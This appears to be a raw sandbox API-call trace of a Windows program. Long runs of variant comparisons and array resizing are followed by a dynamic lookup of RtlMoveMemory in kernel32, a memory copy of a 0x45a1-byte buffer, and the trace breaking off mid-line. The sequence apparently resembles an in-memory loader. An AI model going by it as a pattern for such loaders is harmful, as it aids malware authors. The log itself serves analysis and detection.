VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.456] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.456] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.457] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.457] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.458] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.458] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.459] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.460] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.461] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.462] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.463] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.463] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.465] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.466] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.466] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.467] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.468] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.469] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.470] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.471] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.471] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.472] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.472] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.473] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.474] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.474] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.475] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.476] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.476] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.477] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.477] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.478] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.479] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.479] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.480] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.481] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.481] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.482] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.483] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.483] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.484] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.485] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.485] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.486] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.486] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.487] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.488] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.488] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.489] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.489] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.490] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.491] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.491] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.492] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.492] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.493] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.494] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.495] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.496] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.497] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.498] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.498] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.499] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.500] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.501] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.502] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.503] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.504] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.504] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.505] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.506] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.507] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.508] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.509] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.510] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.510] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.511] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.512] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.513] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.514] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.514] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.515] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.516] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.517] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.518] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.519] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.519] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.520] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.521] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.522] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.523] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.523] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.524] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.525] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.526] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.527] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.527] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.529] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.530] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.531] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.531] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.532] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.533] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.534] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.534] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.535] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.536] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.537] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.538] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.539] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.539] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.540] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.541] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.542] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.543] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.544] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.544] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.545] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.546] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.547] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.548] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.548] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.549] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.550] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.551] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.552] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.552] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.553] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.554] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.555] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.555] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.556] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.557] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.558] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.558] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.559] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.560] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.561] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.562] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.563] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.563] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.564] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.565] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.566] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.567] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.568] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.568] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.569] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.570] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.571] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.571] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.572] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.573] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.573] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.574] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.575] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.576] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.577] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.577] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.578] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.579] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.579] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.580] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.581] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.582] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.582] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.583] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.584] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.585] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.586] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.586] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.587] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.588] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.589] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.590] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.592] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.593] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.595] SafeArrayRedim (in: psa=0x589b70, psaboundNew=0x18f998 | out: psa=0x589b70) returned 0x0 [0069.596] LoadLibraryA (lpLibFileName="c:\\windows\\system32\\kernel32") returned 0x76c20000 [0069.596] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.596] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0069.596] RtlMoveMemory (in: Destination=0x583bf8, Source=0x58df98, Length=0x45a1 | out: Destination=0x583bf8) [0069.596] GetLastError () returned 0x0 [0069.633] GetLastError () returned 0x0 [0069.633] SetLastError (dwErrCode=0x0) [0069.633] GetLastError () returned 0x0 [0069.633] SetLastError (dwErrCode=0x0) [0069.633] GetLastError () returned 0x0 [0069.633] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] 